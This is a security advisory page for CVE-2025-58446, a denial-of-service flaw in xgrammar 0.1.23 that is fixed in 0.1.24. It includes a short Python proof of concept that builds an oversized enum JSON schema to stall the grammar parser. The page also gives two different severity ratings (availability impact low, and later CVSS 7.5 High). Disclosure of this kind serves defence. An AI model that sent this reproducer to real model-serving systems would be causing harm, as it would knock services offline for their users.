🛡️ CVE-2025-58446 — xgrammar
Description
xgrammar vulnerable to denial of service by huge enum grammar
Summary
Provided grammar, would fit in a context window of most of the models, but takes minutes to process in 0.1.23. In testing with 0.1.16 the parser worked fine so this seems to be a regression caused by Earley parser.
Details
Full reproducer provider in the POC section. The resulting grammar is around 70k tokens, and the grammar parsing itself (with the models I checked) was significantly longer than LLM processing itself, meaning this can be used to DOS model providers.
Patch
This problem is caused by the grammar optimizer introduced in v0.1.23 being too slow. It only happens for very large grammars (>100k characters), like the below one. v0.1.24 solved this problem by optimizing the speed of the grammar optimizer and disable some slow optimization for large grammars.
Thanks to @Seven-Streams
PoC
```
import string
import random
def enum_schema(size=10000,str_len=10):
enum = {"enum": ["".join(random.choices(string.ascii_uppercase, k=str_len)) for _ in range(size)]}
schema = {
"definitions": {
"colorEnum": enum
},
"type": "object",
"properties": {
"color1": {
"$ref": "#/definitions/colorEnum"
},
"color2": {
"$ref": "#/definitions/colorEnum"
},
"color3": {
"$ref": "#/definitions/colorEnum"
},
"color4": {
"$ref": "#/definitions/colorEnum"
},
"color5": {
"$ref": "#/definitions/colorEnum"
},
"color6": {
"$ref": "#/definitions/colorEnum"
},
"color7": {
"$ref": "#/definitions/colorEnum"
},
"color8": {
"$ref": "#/definitions/colorEnum"
}
},
"required": [
"color1",
"color2"
]
}
return schema
schema_enum = enum_schema()
print(schema_enum)
print(test_schema(schema_enum, {}))
```
where:
```
def test_schema(schema, instance):
grammar = xgr.Grammar.from_json_schema(
json.dumps(schema),
strict_mode=True
)
return _is_grammar_accept_string(grammar, json.dumps(instance))
```
Impact
DOS
How this vulnerability can be exploited
This issue can be reached over the network, attack complexity is low, an attacker needs no privileges on the target. No user interaction is required. The scope is unchanged, so the impact stays within the vulnerable component. Rated impact: confidentiality none, integrity none, availability low.
Weakness class
CVE-2025-58446 is classified as CWE-770: Allocation of Resources Without Limits. Resources are allocated on request with no cap, so a client can exhaust them.
Affected software
CVE-2025-58446 is recorded against 1 package.
- xgrammar (from 0.1.23 up to 0.1.24)
Timeline and source
Published on 5 September 2025 and last revised on 7 July 2026. A public exploit is known to exist, which raises the urgency of patching considerably. A vendor advisory or fix has been published. Record sourced from OSV.
References
github.com (Web)
nvd.nist.gov (Advisory)
github.com (Web)
github.com (Package)
Details
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Affected Packages
| Software | From version | Fixed in |
|---|---|---|
| xgrammar | 0.1.23 | 0.1.24 |
References
Similar Threats
- High CVE-2026-25048
- High CVE-2025-57809
- Medium CVE-2025-32381
More CVE 2025 advisories
Browse all of CVE 2025 in the advisory index.
Exploit Protection
Are you running xgrammar?
CVE-2025-58446 carries CVSS 7.5 High rating and a public exploit already exists. BotEraser checks your installation against this and other known CVE records, and blocks IPs associated with exploit activity.
Check My Site For CVE-2025-58446 →No credit card required · Results in minutes
ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.